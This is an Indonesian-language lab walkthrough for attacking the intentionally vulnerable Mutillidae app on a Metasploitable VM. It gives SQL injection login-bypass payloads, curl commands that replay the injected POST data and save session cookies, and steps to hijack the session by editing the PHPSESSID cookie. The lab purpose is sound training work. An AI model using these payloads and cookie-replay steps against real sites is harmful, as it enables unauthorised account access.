Lesson 6
Section 6: Open Console Terminal and Retrieve IP Address
- Step 1 : Buka Terminal Kali Linux
- Step 2 : Dapatkan IP address dari Kali Linux
ifconfig
- IP address yang didapatkan
10.151.64.195
- VM Kali Linux ini akan digunakan sebagai penyerang Metasploitable
- IP address yang didapatkan
Section 7: Start Web Browser Session to Mutillidae
- Step 1 : Buka Mozilla Firefox
- Step 2 : Buka Multilidae
Section 8: Go To Login Page
- Step 1 : Klik Login/Register
Section 9: Configure Firefox Proxy Settings
- Step 1 : Buka Preference > Advanced > Network > Settings...
- Step 2 : Konfirgurasi Proxy
- Klik Manual Proxy Configuration
- Ketik
127.0.0.1
di kolom HTTP Proxy - Ketik
8080
di kolom Port - Check Use this proxy server for all protocols
- Klik Ok
- Klik Close
Section 10: Configure Burpsuite Settings
- Step 1 : Buka Burpsuite melalui Applications > Web Application Analysis > Burpsuite
- Step 2 : Pilih Temporary project, lalu next
- Step 3 : Pilih Use Burp defaults, lalu Start Burp
- Step 4 : Buka Proxy > Options, dan pastikan Port berupa 8080
- Step 5 : Buka Proxy > Intercept, ubah Intercept is on menjadi Intercept is off
Section 11: SQL Injection: By-Pass Password Without Username (Obtain Access #1)
- Step 1 : Buka Login/Register
- Step 2 : Ketik
' or 1=1--
di kolom Name dengan spasi di akhir--
- Step 3 : Klik Login
- Step 4 : Anda akan berhasil login dengan akun Admin karena Admin berada pada urutan paling atas pada database. Dengan kondisi
1=1
maka akan menghasilkan kondisi yang selalu benar dan--
berguna untuk comment pada SQL, karena itu query selanjutnya akan dibatalkan (AND password='').- Query yang dihasilkan:
SELECT * FROM accounts WHERE username='' or 1=1-- ' AND password=''
- Query yang sebenarnya dikerjakan:
SELECT * FROM accounts WHERE username='' or 1=1
- Query yang dihasilkan:
- Step 5 : Lihat data request POST
- Klik Proxy Tab
- Klik HTTP History
- Klik baris yang berisi
/mutillidae/index.php?page=login.php
- Klik Request Tab _ Klik Raw Tab
- Lihat POST Data String
username=%27+or+1%3D1--+&password=&login-php-submit-button=Login
%27
adalah petik satu (')+
adalah spasi%3D
adalah sama dengan (=)
Section 12: Simulate CURL SQL Injection: (Obtain Access #1)
- Step 1 : Klik Logout
- Step 2 : Gunakan Curl untuk mekakukan login dengan POST data yang didapatkan dengan Burpsuite pada Section 11
curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "username=%27+or+1%3D1--+&password=&login-php-submit-button=Login" --location "http://10.151.36.64/mutillidae/index.php?page=login.php" > login1.txt
- menampilkan hasil "Logged In Admin"
grep "Logged In" login1.txt
- menampilkan session cookies beserta PHP session ID (PHPSESSID)
cat crack_cookies.txt
- menampilkan hasil "Logged In Admin"
Section 13: SQL Injection: Single Quote Test On Password Field (Obtain Access #2)
- Step 1 : Buka Login/Register.
- Step 2 : Ketik
samurai
di kolom Name. - Step 3 : Klik Kanan di kolom Password.
- Step 4 : Klik Inspect Element.
- Step 5 : Ganti
password
dengan katatext
pada elemen type. Ganti elemen maxlength menjadi50
dan elemen size menjadi50
- Step 6 : Ketik
' or (1=1 and username='samurai')--
di kolom Password. Jangan lupa memberikan spasi setelah--
- Step 7 : Klik Login. Perhatikan kolom password sudah tidak lagi tersensor dengan bintang karena type sudah diganti menjadi
text
.- Anda akan berhasil login sebagai
samurai
- Query yang dihasilkan
SELECT * FROM accounts WHERE username='samurai' AND password='' or (1=1 and username='samurai')-- '
- Anda akan berhasil login sebagai
- Step 8 : Lihat data request POST
- Klik Proxy Tab
- Klik HTTP History
- Klik baris yang berisi
/mutillidae/index.php?page=login.php
- Klik Request Tab
- Klik Raw Tab
- Block semuta teks lalu klik kanan
- Klik "Copy to File"
- Simpan sebagai
burp2.txt
- Step 9 : Lihat Post Data
grep -i cookie burp2.txt
grep -i username burp2.txt
- Step 10 : Logout dan tutup Mozilla Firefox
Section 14: Simulate cURL SQL Injection: (Obtain Access #2)
- Step 1 : Buka Terminal
- Step 2 : Hapus file crack_cookies.txt
rm crack_cookies.txt
- Step 3 : Gunakan POST Data dari burp2.txt
grep -i username burp2.txt
- Step 4 : Lakukan Autentikasi menggunakan Curl
curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "username=samurai&password=%27+or+%281%3D1+and+username%3D%27samurai%27%29--+&login-php-submit-button=Login" --location "http://10.151.36.64/mutillidae/index.php?page=login.php" > login2.txt
- Cek status Autentikasi
grep "Logged In" login2.txt
- menampilkan session cookies beserta PHP session ID (PHPSESSID)
Cat crack_cookies.txt
- Cek status Autentikasi
Section 15: Restore Firefox Original Proxy Configurations
- Step 1 : Buka Preference > Advanced > Network > Settings...
- Step 2 : Konfirgurasi Proxy
- Klik No Proxy
- Klik Ok
- Klik Close
Section 16: Simulate Man-In-The-Middle Attack
- Step 1 : Install Cookies Manager+
- Step 2 : Buka Cookies Manager+
- Step 3 : Buka Cookies dari crack_cookies.txt
- Step 4 : Edit PHPSESSID dari host
10.151.36.64
- Name: PHPSESSID
- Content: 993789dd2451026982b1068764bcf2de (sesuaikan dengan crack_cookies.txt)
- Host: 10.151.36.64
- Path: /
- Save
- Step 5 : Tambah entri cookies showhints
- Click Add
- Name: showhints
- Content: 0 (sesuaikan dengan crack_cookies.txt)
- Host: 10.151.36.64
- Path: /mutillidae/
- Save
- Step 6 : Tambah entri cookies username
- Click Add
- Name: username
- Content: samurai (sesuaikan dengan crack_cookies.txt)
- Host: 10.151.36.64
- Path: /mutillidae/
- Save
- Step 7 : Tambah entri cookies uid
- Click Add
- Name: uid
- Content: 6 (sesuaikan dengan crack_cookies.txt)
- Host: 10.151.36.64
- Path: /mutillidae/
- Save
- Step 8 : Buka
http://10.151.36.64/mutillidae/index.php
, anda akan terlogin sebagai samurai